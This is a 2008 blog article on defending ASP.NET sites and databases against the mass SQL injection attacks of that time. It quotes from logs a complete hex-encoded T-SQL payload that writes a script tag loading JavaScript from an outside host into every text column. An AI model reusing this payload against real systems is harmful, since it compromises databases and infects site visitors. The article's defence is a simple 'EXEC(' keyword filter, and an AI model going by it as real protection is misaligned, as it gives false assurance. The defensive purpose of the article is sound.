English Version
Recherche d'articles : Publier Votre Article
> SQL injection Attacks : How To Shield Your Asp.Net Website and Database <
Publiée le 7/18/2008 Par Malek Chtioui
SQL injection Attacks : How To Shield Your Asp.Net Website and Database :

You may have seen this http request in your website logs :

my_page.aspx?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C404
32076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C6563742061
2E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E6964
3D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722
0622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E455
8542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302
920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B272722
3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F78756E6C65692E766572796E782E636E2F772E6A73223E3C2F
7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F78756E6C65692E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727
294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F534520546162
6C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);


And in a more readable form:

DECLARE @S NVARCHAR(4000)
SET @S=CAST(0x4445434C4152452 ... 5F437572736F72 AS NVARCHAR(4000))
EXEC(@S)


This Script takes advantage of the CAST function and the S variable when decoded contains a T-SQL script that inject a script in all fields with type VARCHAR in the Database, and then when a user open a web page the script call an external javascript file using Cross-Site Scripting (XSS) exploit.

Many websites are still vulnerable to SQL Injection attacks,
the easiest way to protect your application and database is ta add a filter in the Application_BeginRequest sesion of the global.asax file :

protected void Application_BeginRequest(object sender, EventArgs e)
    {
        HttpContext context = HttpContext.Current;
        if (context != null)
        {
            string queryString = context.Request.ServerVariables["QUERY_STRING"];
            if (! string.IsNullOrEmpty(queryString))
            {
                queryString = Server.UrlDecode(queryString);
                queryString = queryString.Replace(" ", string.Empty).ToUpper();

                if (queryString.Contains("EXEC("))
                {
                    // Error Handling
                    // .........................

                }
            }
        }
    }

If you have been attacked you must scan your databases for malicious scripts, for this you can use this T-SQL script :

  exec sp_msforeachdb '
  Print(''Scanning Database [?]'')
  DECLARE @T varchar(255), @C varchar(255)
  DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from [?].dbo.sysobjects a,[?].dbo.syscolumns b
  where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
  order by a.name, b.name
  OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
  If Left(@T,1)<>''#''
  Begin
  Print('' Scanning Table [''+@T+''], Column: [''+@C+'']'')
  Exec(''if exists(select [''+@C+'']  from [?].dbo.[''+@T+''] where [''+@C+''] like ''''%<script%'''') print ''''>>> FOUND in [''+@T+''].[''+@C+'']'''''')
  End
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
  DEALLOCATE Table_Cursor
  '


other Helpful links :

> Microsoft Source Code Analyzer for SQL Injection is a static code analysis tool for finding SQL Injection vulnerabilities in ASP code. Customers can run the tool on their ASP source code to help identify code paths that are vulnerable to SQL Injection attacks.

> Scrawlr : a tool to help identify code paths that are vulnerable to SQL Injection, Scrawlr is developed by HP Web Security Research Group in coordination with Microsoft Security Response Center (MSRC)
 Commentaires : Publier Votre Article
 Ajouter un commentaire :
Nom (ou pseudo) :
Email :
   * Adresse non affichée avec votre message.
Titre :
Commentaire :
Autre articles
Je suis un Terroriste
 Par Malek Chtioui, Date : 5/21/2007
Moniteurs FED et SED : La Nouvelle technologie 2009
 Par Houda Mansour, Date : 4/21/2007
Tozeur, Tunisie
 Par Xcess, Date : 1/23/2007
JVC : premier DVD-RW double couche au monde
 Par Houda Mansour, Date : 9/3/2007
Nouvelle Tesla Roadster, une vraie voiture de sport électrique
 Par Malek Chtiwi, Date : 7/10/2007
Top 5
Déblocage Nokia gratuit (Free Nokia Unlock)
 Par xcess, Date : 2/23/2007
Planter un avocatier, Tout ce qu'il faut savoir.
 Par Malek Chtioui, Date : 4/22/2007
Tout savoir sur la conception d'un bébé
 Par Houda Mansour, Date : 6/10/2007
Le Milieu du cycle (Tout savoir sur la conception d'un bébé P2)
 Par Houda Mansour, Date : 6/10/2007
Comment Restaurer/Reformater votre Téléphone NOKIA (Mobiles Nokia Série 60)
 Par James, Date : 2/22/2008